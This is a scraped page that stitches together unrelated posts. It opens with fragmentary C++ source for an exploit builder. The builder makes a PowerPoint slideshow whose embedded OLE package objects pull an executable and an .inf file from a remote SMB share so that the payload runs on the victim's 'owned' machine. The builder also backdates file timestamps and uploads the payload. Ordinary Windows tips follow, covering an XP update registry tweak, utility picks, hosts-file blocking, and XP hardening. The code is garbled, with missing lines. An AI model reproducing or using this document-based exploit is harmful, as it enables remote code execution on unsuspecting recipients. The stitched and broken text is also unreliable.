    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Save presentation
    CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );

    CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );

    bres = true;


    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );

    SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );

    SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );

    /* Release resources assigned with Shape0 and Shape1
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Release resources assigned with Presentation
    SAFE_RELEASE_BY_REF( &pSlideShowTransition );
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Close Currently opened presentation
    if (pPresentation) {

    pPresentation ->raw_Close();
    SAFE_RELEASE_BY_REF( &pPresentation );

    SAFE_RELEASE_BY_REF( &pPresentations );

    /* Close powerpoint automation application
    if (pApplication) {

    pApplication ->raw_Quit();

    SAFE_RELEASE_BY_REF( &pApplication );

    return bres;

    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {

    bool bresult = false;
    IStorage *pStorage = NULL;
    IStream *pStream = NULL;
    HRESULT hresult = S_OK;
    CLSID clsidMedia = {0};
    VOID *pvFileData = NULL;
    size_t dataSize = 0;
    ULONG bytesWritten = 0;
    char trailer = 0;
    wstring stdWstrFileNameOut;


    hresult =

    if (FAILED(hresult)) {

    //printf(“[-] %s(): StgCreateStorageEx failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    hresult =
    pStorage ->CreateStream(

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStorage::CreateStream failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    dataSize = strlen(str1) + 1 + strlen(str2) + 1;

    // write header
    hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(header) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 1
    hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 1 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 2
    hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write string 2 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    // write class of storage
    hresult = CLSIDFromString( L”{00022602-0000-0000-C000-000000000046}”, &clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): CLSIDFromString failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    hresult = WriteClassStg(pStorage, clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): WriteClassStg failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);


    //printf(“[+] %s(): Storage %S created.rn”, __FUNCTION__, file_result);
    change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );

    bresult = true;

    SAFE_RELEASE_BY_REF( &pStream );

    SAFE_RELEASE_BY_REF( &pStorage );

    if(pvFileData) {


    return bresult;


    bool create_somthing_file(wchar_t *fpath) {

    DWORD bytesWritten = 0;

    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fpath);

    return false;

    if (FALSE == WriteFile( hFile, “Some Datan”, strlen(“Some Datan”), &bytesWritten, NULL)) {

    wprintf(L”[-] ERROR: Cannot write temporary file %s with some datan”, fpath);


    return false;


    return true;

    bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {

    DWORD bytesWritten = 0;
    wstring stdFnameExeOnSmb;
    string stdFnameExeOnSmbA;
    string data;
    BOOL bres = FALSE;

    stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());

    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fnameInf);

    return false;

    data.append(“; 61883.INFn”);
    data.append(“; Copyright (c) Microsoft Corporation. All rights reserved.nn”);

    data.append(“Signature = “$CHICAGO$”n”);

    data.append(“DefaultDestDir = 1nn”);

    data.append(“RenFiles = RxRenamen”);
    data.append(“AddReg = RxStartnn”);

    data.append(“.exe, “);


    bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);



    return (bres);

    int wmain(int argc, wchar_t **argv) {

    wstring stdWstrSaveAs,

    wstring stdFnamePptIn,
    string stdPathExeOnSmbA,

    bool bForceUpload = false;

    wchar_t currDir[MAX_PATH];

    GetCurrentDirectoryW(MAX_PATH, currDir);

    if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {

    printf(“[-] ERROR: invalid inputn”);

    return 0;




    /* Construct a path to exe on SMB as %stdSmbPath%%stdFnameExeOnSmb%
    stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());

    /* Construct a path to inf on SMB as %stdSmbPath%%stdFnameInfOnSmb%
    stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());

    /* Construct a path to tmp1 file

    if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {


    /* Construct a path to tmp2 file

    if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {


    /* Modify presentation imm
    if (!produce_presentation(
    (wchar_t *)stdWstrSaveAs.c_str(),
    (wchar_t *) stdPathTmp1.c_str(),
    (wchar_t *) stdPathTmp2.c_str()
    ) )

    printf(“[-] ERROR: cannot update presentationn”);


    /* Create OLE 1-th Object

    if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), “EmbeddedStg1.txt”, (char*)stdPathExeOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 1-th OLE Objectn”);


    /* Create OLE 2-th Object
    if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), “EmbeddedStg2.txt”, (char*)stdPathInfOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 2-th OLE Objectn”);


    /* Generate inf file

    if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {

    printf(“[-] ERROR: Cannot generate inf filen”);

    /* Generate exe for SMB

    if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
    wprintf(L”[-] ERROR: Cannot create ‘%s’ from ‘%s’n”, stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());


    /* Upload files onto remote shared folder
    if (bForceUpload) {

    if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .exe file ‘%s’ to ‘%s’n”, stdPathExe.c_str(), stdSmbPath.c_str());

    if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .inf file ‘%s’ to ‘%s’n”, stdPathInf.c_str(), stdSmbPath.c_str());
    int step = 1;
    wprintf(L”[+] INFO: n”);
    wprintf(L” %d) Rename presentation file ‘%s’ to ‘’;n”, step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
    wprintf(L” %d) Stupid MS developers cann’t create API for zip, so unzip ‘’n”, step++, stdWstrSavedAs.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject1.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject2.c_str());
    wprintf(L” %d) Zip unzipped presentation and rename to presentation with ‘.ppsx’n”, step++);
    if (bForceUpload) {
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Enjoy..n”, step++);


    DeleteFileW( stdPathTmp1.c_str());

    DeleteFileW( stdPathTmp2.c_str());



    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {

    bool bres = false;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape = NULL;
    PowerPoint::OLEFormat *pOLEFormat = NULL;
    long slidesCount = 0;
    VARIANT varSlideIndex,
    int shapesCount = 0;
    MsoAutoShapeType shapeType;
    BSTR bstrProgId = NULL;
    IDispatch *pOLEDispObject = NULL;

    assert(doesHave != NULL);
    assert(pPresentation != NULL);

    *doesHave = false;

    /* Get pointer to interface of Slides object.
    CHK_HR(pPresentation ->get_Slides(&pSlides) );

    /* Get count of slides in presentation
    CHK_HR(pSlides ->get_Count(&slidesCount) );

    /* Make sure that slides exist in presentation
    if (slidesCount == 0) {

    printf(“[-] Failed couse no slides found in presentationn”);


    for (long i = 1; i <= slidesCount; i ++) {

    VariantInitAsLong(varSlideIndex, i);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    VariantClear( &varSlideIndex );

    /* Get list of shapes
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Get count of shapes
    CHK_HR( pShapes ->get_Count(&shapesCount) );

    /* Verify each shape
    for (int j = 1; j <= shapesCount; j++) {

    VariantInitAsLong( varShapeIndex, j);

    CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );

    VariantClear( &varShapeIndex );

    CHK_HR( pShape ->get_AutoShapeType( &shapeType) );

    if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {

    CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );

    CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );

    if (wcsicmp( L”Package”, bstrProgId) == 0) {

    *doesHave = true;

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );


    SAFE_RELEASE_BY_REF( &pShape );

    if (*doesHave) {


    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    if (*doesHave) {


    bres = true;


    VariantClear( &varShapeIndex );

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );


    SAFE_RELEASE_BY_REF( &pShape );

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    SAFE_RELEASE_BY_REF( &pSlides );

    return bres;

    bool change_file_time(wchar_t *fname) {

    SYSTEMTIME systemTime = {0};
    FILETIME fileTime = {0};

    GetSystemTime( &systemTime);

    systemTime.wYear = 1980;
    systemTime.wMonth = 1;
    systemTime.wDay = 1;
    systemTime.wHour = 15;
    systemTime.wMinute = 0;
    systemTime.wSecond = 0;

    hFile =

    if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {

    return false;

    SystemTimeToFileTime( &systemTime, &fileTime);

    SetFileTime( hFile, &fileTime, &fileTime, &fileTime);


    return true;

    bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
    Oh fuck! Stupid Microsoft developers cann’t create human-relible
    API for zip management. 21st century! WTF? I cann’t use IShell
    interface for zip management, so use 3rd party zip archivers.

    bool bres = false;
    IShellDispatch *pShell = NULL;
    VARIANT varDir,
    Folder *pFolder = NULL;
    wstring stdWstrDir;



    CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );

    varDir.vt = VT_BSTR;
    varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

    CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

    varFile.vt = VT_BSTR;
    varFile.bstrVal = _bstr_t(fnameData);

    varOption.vt = VT_I4;
    varOption.lVal = FOF_NO_UI;

    CHK_HR( pFolder ->CopyHere( varFile, varOption) );

    Sleep( 1000 );

    bres = true;


    //VariantClear( &varOption );
    //VariantClear( &varFile );
    //VariantClear( &varDir );

    SAFE_RELEASE_BY_REF( &pFolder );

    SAFE_RELEASE_BY_REF( &pShell );

    return bres;

    bool parse_cmd(
    __in int argc,
    wchar_t **argv,
    wstring *fnamePptIn,
    wstring *smbPath,
    wstring *fnameExe,
    wstring *fnameExeOnSmb,
    wstring *fnameInfOnSmb,
    bool *bForceUpload
    wstring stdOpt;
    bool bFnamePptIn = false,
    bSmbPath = false,
    bFnameExe = false,
    bFnameExeOnSmb = false,
    bFnameInfOnSmb = false;

    if (argc < 11) {


    return false;

    for (int i = 1; i < argc; i++) {



    if (”–force-upload”) == 0) {

    *bForceUpload = true;


    if ((i+1) >= argc) {

    printf(“[-] ERROR: malformed inputn”);

    return false;

    if (”-p”) == 0 ) {

    fnamePptIn ->clear();

    fnamePptIn ->append( argv[i+1]);


    bFnamePptIn = true;


    if (”-smb”) == 0 ) {

    smbPath ->clear();

    smbPath ->append( argv[i+1]);


    bSmbPath = true;


    if (”-ef”) == 0 ) {

    fnameExe ->clear();

    fnameExe ->append( argv[i+1]);


    bFnameExe = true;


    if (”-eof”) == 0 ) {

    fnameExeOnSmb ->clear();

    fnameExeOnSmb ->append( argv[i+1]);


    bFnameExeOnSmb = true;


    if (”-iof”) == 0 ) {

    fnameInfOnSmb ->clear();

    fnameInfOnSmb ->append( argv[i+1]);


    bFnameInfOnSmb = true;


    if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {

    printf(“[-] ERROR: Not all options specifiedn”);

    return false;

    return true;

    void print_usage_and_exit(wchar_t *exe) {

    L” **************************************************************** n”
    L”[?] Usage: %s [option|[option]…] n”
    L” **************************************************************** n”
    L” options: n”
    L” -p – path to input PowerPoint presentation file; n”
    L” -smb – UNC path on remote server in which files should be n”
    L” placed, f.e: ; n”
    L” -ef – path to executable file to be launched on 0wned n”
    L” machine; content of file ‘ll be stored into -eof n”
    L” file; n”
    L” -eof – name of file into which -ef file’s content to be n”
    L” stored; exploit uploads this file onto -smb path n”
    L” automatically; make sure that -eof file is located n”
    L” on remote server before exploitation phase; n”
    L” -iof – name of .inf file to be stored on remote server; n”
    L” exploit extracts .inf stub from self and stores into n”
    L” file on remote host automatically; make sure that n”
    L” this file exists on remote server before exploitation n”
    L” phase; n”
    L” –force-upload n”
    L” – specifies explicit file’s uploading to remote server; n”
    L” **************************************************************** n”
    L” EXAMPLE: n”
    L” -p a.pptx -smb -ef E:stub.exe n”
    L” -eof Config.xml -iof Preview.inf –force-upload n”
    L” creates a.pptx.saved.ppsx file from a.pptx; n”
    L” stores stub.exe into; n”
    L” stores .inf stub into; n”
    L” **************************************************************** n”
    L” NOTES: n”
    L” -smb, -iof, -eof are written into presentations, so make sure n”
    ” that specified things exist in real life; n”
    L” **************************************************************** n”,


    /* EOF

Microsoft XP updated until 2019 – tweak

The registry addition tricks Microsoft into thinking your PC is running the Point Of Sale “Embedded” version of Windows, which will continue to have updates until 2019. The change only works on 32-bit systems, not 64-bit. Microsoft warns this is a bad idea and suggests, naturally, you replace the operating system with Windows 7 or higher. If you make this change to an XP machine, you do this at your own risk. To make the change:

Make sure your computer is properly backed up in case anything goes wrong. Then, open Notepad to create a new text document.

Paste in the following text:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMWPAPosReady]  "Installed"=dword:00000001

Save the text file, but change its extension from .txt. to .reg.

Double-click your newly-created .reg file to make the tweak.

If you have a system that you can’t quite get rid of yet, this could make it last a bit longer. Hit the link below to read more about the tweak.

Top 10 Incredibly Useful Windows Programs to Have On Hand

Some apps are essential, and you use them every day. Everyone knows their names: Firefox, VLC, 7-Zip, and so on. However, there’s another class of app that gets less attention: the apps that are insanely useful to have in your back pocket on the rare occasions you need them. Here are 10 of our favorites.

10. Speccy

Maybe you’ve forgotten what kind of RAM you bought, or want a quick glance at your CPU’s temperature. Speccy scans your machine and gives you a complete rundown of everything, from model numbers to temperatures, fan speeds, S.M.A.R.T. status, and…well, pretty much anything else you can think of. It’s also available in portable form, so you don’t have to install anything—just stick it in a folder for when you really need it. For an alternative, check out HWiNFO.

9. Ultimate Windows Tweaker

When you first install Windows, you probably get everything set up just the way you like it, including all your favorite little Registry hacks and unsupported tweaks. You might even discover new ones later and try them out. Apps like Ultimate Windows Tweaker make this a lot easier, and they’re useful to keep around later if you start incorporating new things into your workflow. Its list of features is endless, allowing you to tweak the tiniest features in the taskbar, Windows Explorer, the lock screen, and anything else you could imagine. Download it once and keep it forever (and as always, back up before you start tweaking your system).

8. Stress Testing Utilities

Overclockers are probably very familiar with stress testing utilities like Prime95, LinX, and AIDA64. If you’ve overclocked your CPU, you should definitely keep these around, but they can be useful for non-overclockers too. When your processor is having issues, it can be difficult to diagnose. If some of your apps are crashing, a stress test like Prime95 can help you figure out whether your CPU is the problem (or whether it’s something else). Many folks also recommend giving a new computer a stress test to make sure there aren’t any problems. Most of these are also portable, so you can throw them in a folder and start them up when you need them.

7. MalwareBytes, VirusTotal, and AdwCleaner

We put these in the same category since they all protect you from unwanted programs, but they’re each useful in their own right. You probably have a good antivirus program running all the time, but no antivirus program catches everything—so it’s useful to have a secondary program to check once in awhile. MalwareBytes is great because it only works on-demand, which means it won’t conflict with your always-running antivirus tool. The VirusTotal Uploader, on the other hand, lets you scan any individual file with over 50 antivirus tools at once, so it’s great if you’ve downloaded something you think might be fishy. Lastly, if you’ve accidentally installed an annoying toolbar on your system that just won’t go away, AdwCleaner will help you get rid of it.

6. Magical Jelly Bean KeyFinder

Ever had to reinstall a program, but couldn’t find your product key? Magical Jelly Bean KeyFinder will search your PC for installed programs, and—if they have a product key—show them to you, so you can write it down and use it the next time you reinstall. Note: this one contains some toolbars and such upon installation, so be sure to use the custom installation to avoid the crapware.

5. Process Explorer

The Windows Task Manager can show you a lot of information about what programs are running, and usually it does what you need it to. But on the rare occasions you need more information—like if you’re trying to figure out which program is using your webcam, for example—you need Process Explorer. Process Explorer is one of the many Task Manager alternatives out there, offering information on what files are currently in use, what hardware, and what each program is doing. If the regular Task Manager isn’t giving you the info you need, Process Explorer will.

4. UNetbootin and YUMI

Even if you’re a diehard Windows user, Linux can be really useful from time to time—especially for troubleshooting. Traditionally, Linux distros and other troubleshooting tools come in the form of live CDs, but if you don’t have a CD drive, UNetbootin is a seriously handy tool. It can turn nearly any ISO into a bootable flash drive. Even better is YUMI, which lets you put multiple live CDs on one flash drive—meaning you can combine all your favorite rescue discs, Linux distros, and other tools and put them in your pocket.

3. Wireless Network Watcher (and Other Network Tools)

Need to see a list of all the computers on your network, along with IP addresses, MAC addresses, and other information? Whether you’re planning your network or think someone’s stealing your Wi-Fi, Wireless Network Watcher is a handy tool to have around. Despite its name, it works over wired networks, too. Of course, we also recommend checking out all of NirSoft’s network tools—which one you use depends on what you’re trying to troubleshoot, but they’re all pretty awesome.

2. WinDirStat

We all reach that fateful day at some point: when your computer tells you its running out of space. Not sure where it’s all going? WinDirStat will tell you. It scans all of your disks and shows you the biggest folders, which file types are taking up space, and more. If you’ve tried the usual things (like Disk Cleanup) and are still coming up short, WinDirStat is the next step in the disk cleaning process.

1. Sandboxie

Let’s admit it: sometimes, even though we know it’s wrong, we all open the occasional sketchy program or file. We’re not judging, but if you’re going to do it, at least use protection. Enter Sandboxie, which lets you run programs independent of the rest of your system. That way they can’t infect, access, or otherwise interfere with your Windows installation. It’s also great for testing apps you aren’t sure of or running multiple instances of an app that won’t let you, so it’s fun for the whole family.

How to block access to a website

If you are concerned about someone in the family or workplace using a certain website, there are a few different methods of restricting access. Although it is possible to block access on a specific browser, many computers these days have more than one browser available to a user.

Another option is to edit a file within windows known as the hosts file. Using this method makes it possible to restrict access to a particular website regardless of what browser someone is using.

Step 1

Move the mouse to either the top or bottom right corner of the screen and the Charms menu will slide into place.

From this menu click on Search.

Select Search from Charms menu

Step 2

Make sure that Apps is selected and type Notepad.

On the left side of the screen, the Notepad should appear.

Search for notepad

Step 3

Do not double click on Notepad, instead click on it once to select it and a row of options will appear along the bottom of the screen.

From this row of options click on “Run as administrator”.

Select Run As Administrator from bottom row of options

Step 4

A small ‘User Account Control’ window may appear asking if you want to process – click “Yes”.

You will be taken to the desktop environment with a blank notepad file open.

Confirm UAC warning

Step 5

From the row of options along the top of the notepad file, click on File and from the drop-down list that appears click on Open.

A window will open with a column of options on the left. From these options we are looking for the C drive. In some cases it may be labelled as Local Disk. In other cases it may have the name of the computer’s manufacturer.

Open - Select C drive

Step 6

When you have located the C driveclick it once to highlight it and a number of folders will be listed on the right.

Scroll down the folders listed and double-click on the ‘Windows’ folder.

Select Windows folder

Step 7

You will then be displayed with all of the folders within the windows directory.

Scroll down again and this time double-click on the ‘System32’ folder.

Select System32 folder

Step 8

Within this folder, scroll through the available folders and double-click on ‘Drivers’.

Select Drivers folder

Step 9

This time you are looking for the ‘etc’ folder. Double-click on the ‘etc’ folder to open it and at first it may look like you have opened a blank folder.

Select etc folder

Step 10

Towards the bottom right corner of this window is an the item labelled Text Documents (*txt).Click on the arrow next to it and from the options listed click on ‘All files’.

Select All files from dropdown menu

Step 11

More files should now be listed – it is the ‘hosts’ file we are interested in.

Click on this file once to highlight it and then click Open.

Open the hosts file

Step 12

A notepad file should now open which is names ‘hosts’.

If you want to block access to a particular website, at the bottom of this file write the number:, press space-bar once and the enter the www address of the site you want to block.

For example if you wish to block Facebook type the following:

Notice that we DO NOT need to include a # symbol at the start of the line like the other lines in the file have.

Block access the facebook

Step 13

At the top click File and then Save. Bring up your Internet browser to test the website.

If the details were entered correctly you should not be able to access that particular website.

If you wish to do the same with any other websites, simply access the hosts file again in the same way and add the other website address at the bottom of the file.

If you change your mind at any point, access the hosts file again, delete the line with the blocked website address and Save the hosts file again.

Unable to access website

Total Commander or Free Commander a must have Windows file Explorer alternatives

Whether coming from Linux background and you’re forced to work with MS Windows or even if you’re born as a Windows user  and you hold a strong dislike for Windows File Explorer . You will certainly appreacite some Windows Explorer alternative like…

Continue reading Total Commander or Free Commander a must have Windows file Explorer alternatives

How to change Outlook Signature – modify and delete Microsoft Outlook email signatures

I’m using Mozilla Thunderbird over the last 5 years in my life. Just now in my new job place in Hewlett Packard , in order to have well functional mail (with exchange server) – I started using Microsoft Outlook . Logically a little while after I started…

Continue reading How to change Outlook Signature – modify and delete Microsoft Outlook email signatures

Windows Xp after 8th of April

Microsoft has confirmed that all existing security patches and updates for Windows XP will still be available after support officially ends. This means that after the 8th April 2014, you’ll still be able to use Windows Update to download all existing security patches.

However let’s create an WINDOWS XP SP3 disk now after for safekeeping


First, you’ll need to download the Windows XP SP3 Network Installation Package, which is the standalone install for XP. Click the Download button and, when prompted, select Proceed with this download and click Next. Click No thanks and then Continue and the file will be downloaded to your hard disk. If you’re using Internet Explorer, you may have to click the security warning to allow the download; make sure you click Save, so that you keep the file.


Next, you need to download all of the Windows XP updates post SP3. It makes sense to do this after XP support has ended on the 8th April 2014, so that you get absolutely everything.

Fortunately, there’s a rather clever tool to do the job for you. Download the Updates Downloaded, Check and Add-on Creator (UDC) script. The page lists the date that the script was last updated, so make sure you grab one dated for the 8th of April or later, in order to catch the final XP updates.

Extract the Zip file, go into the UDC folder and run the latest UDC batch file. Follow the on-screen instructions, ignoring the warning about Nlite (we’ll come to that next) and the file will download all of the updates to the current folder. It will take a while, so leave it to do its job. When completed, the window will go green. Move the files that start WindowsXP-WindowsMedia-KBxxxxxx-x86-ENU.exe into a temporary folder on your hard disk, otherwise you’ll find that XP gets stuck in an installation loop. We’ll show you how to copy these files to your new install disc later.


Now you need to download and install nLite. This clever bit of software is used to take your XP installation disc, SP3 and updates you’ve already downloaded, and create a brand-new XP installation disc with everything already applied.

When it’s installed run the software from the Start menu to start the wizard, which will take you through creating your new installation disc.


Click Next and you’ll be asked to provide the location of your Windows disc. This can either be an ISO file or you can just put your XP installation disc into your PC and browse to the drive.

Click OK and you’ll be prompted to select a folder to store the temporary files in. We created a folder called XP in the C: drive. Click OK, and the XP files will be copied to the temporary folder and Nlite will show you which version of XP you have and the Servicer Pack version (if any) included. Browse to the folder you created and, inside it, create a new folder called Media Updates. Copy the update files you moved to a temporary folder in Step 1 into this folder. This will mean that the files will be copied to the installation disc, allowing you to run them manually later.


Click Next and you can load any previous nLite presets, if you have any. Click Next to select the additional files you want to create, so click Service Pack and Hotfixes, Add-ons and Update Packs. With nLite, you can also integrate additional drivers, select an unattended installation, which inputs your CD key automatically, and more, but we’re not going to cover that here. Instead, click Bootable ISO to tell nLite that you want to create an install disc. Click Next to go to the Service Pack selection screen.

Click Select and use Explorer to select the XP SP3 file you downloaded earlier and click Open. NLite will automatically slipstream the files into the installation. Click Next to go to the add-on screen. Click Insert and browse to the files you downloaded in Step 2. Press CTRL-A to select all (don’t worry about the files that aren’t updates, as nLite will deal with them automatically) and click Open. Click OK on any warning messages and click Next, then Yes to get nLite integrating the updates.


Once the process has completed, you’ll be told how big the new installation file is. In our case, it was 604.16MB, which should still fit on a blank CD; if yours is bigger than 640MB, you’ll need a blank DVD instead. Click Next to go to the Bootable ISO screen. NLite can write straight to disc, but we think it’s better to save the ISO file, so you can use it again and again. Leave the Mode as Create Image and click Make ISO. Select where you want to save the file and click Save. It will only take a short time to make the disc, which will be called WinLite.iso, although you can type any filename that you like.


You can now use the same dialog box to burn your installation CD, by selecting Direct Burn and clicking Next. Alternatively, if you’d rather do the job yourself, you can use any bit of disc burning software to burn your ISO to disc. We like CDBurnerXP, which you can download and install using the Ninite software.

Browse to your ISO file, right-click it and select Open With, CDBurnerXP. In the next dialog box, select your CD/DVD writer in the Target device drop-down menu, make sure you’ve inserted a blank disc and click Burn disc. You can now use this to install an up-to-date version of XP. Make sure you backup your new ISO, so you can create a new disc whenever you need it. You can now install Windows XP from your new disc, and manually apply the Media patches, too.


To stop flaws in Windows XP being exploited, you need to have proper security software installed on your computer. This will help negate the impact of no longer having security updates coming from Microsoft. You need to choose carefully, though, as your existing security might not be good enough.

Although Microsoft has said that Security Essentials, its free security package, will continue to get XP updates until July 2015, you shouldn’t rely on it, as it always comes near the bottom in our AV tests. Instead, you need to install decent security software to protect against threats.

If you want free protection, Avast! 2014 Free anti-virus is a far superior product. However, if you can, you should buy a security suite. Kaspersky Internet Security 2014 is our favourite security suite, blocking all the live threats we put against it. In addition, Kaspersky will detect many exploits, preventing criminals from being able to take over your computer.


As we pointed out, it can be other out-of-date bits of software that create security holes criminals can exploit. For this reason, you need to make sure that you keep all software completely up-to-date. A lot of software will automatically update itself, but not all will.

To save manually checking, you can use a free software updater instead. These scan your computer for installed applications, then check online to see if there’s a newer version installed. There are a few programs out there, but Secunia PSI and Update Notifier are two of the best.


Device drivers have been known to contain security flaws, which can be exploited, so it’s important to keep these updated, too. There are free tools, such as Device Doctor, which will scan your computer for drivers and let you know if there’s an updated version available. Make sure you decline all the other bits of software Device Doctor asks you to install when you run its installation program.


If you’re using Internet Explorer under Windows XP, it’s time to stop. Windows XP only supports Internet Explorer 9, which means that it’s at least two versions out of date and vulnerable to some exploits.

Fortunately, both Google Chrome and Firefox have been continuously updated for Windows XP, so you can download the latest version and be confident that you’ll get future updates, too.


Java has had a bit of a kicking in recent times, with big failures in its security causing a lot of problems. One of the most sensible things you can do is disable Java from running in browsers, which means you can still run standalone Java-based apps, but your browser won’t run this content online. To do this go to the Control Panel and select Java from the Classic view. Click the Security tab and deselect the ‘Enable Java content in the browser’ tickbox. Click OK to apply the setting. You’ll be warned that you’ll need to restart your browsers for the changes to take effect.


Limited accounts are a great way to use Windows XP securely. As the name suggests, these accounts have restrictions on them, so they can’t install or remove all applications, or make system-wide changes, such as changing a hard disk’s partitions. However, a Limited account also means that software you encounter can’t do any of the above things, either. So, if you’re running a Limited account and run some malware, it will be as limited as you are.

There are a couple of tricks, which we’ll show you, for running things as Administrator when you need to. This means that you’re protected day to day, but you have Administrator tools ready when you need them.

To create a Limited account, first you need to log in as an Administrator and make sure the account has a password. Go to Control Panel, User Accounts and select your user account. Click Create a password and enter a new password twice. Enter a hint if you want, then click OK. Next click Home, then click Create a new account and give it a name, click Next, then select Limited and click Create Account. You’ve now got a Limited user account. You can set a password for it by following the steps at the start of this paragraph. You can now restart your computer and log in as the Limited account.

Create a Shutdown Shortcut for windows 8

1. It starts, ironically, in Desktop mode, which you can reach by clicking/tapping the Desktop tile or pressing Win-D (that’s the Windows key and the letter D).

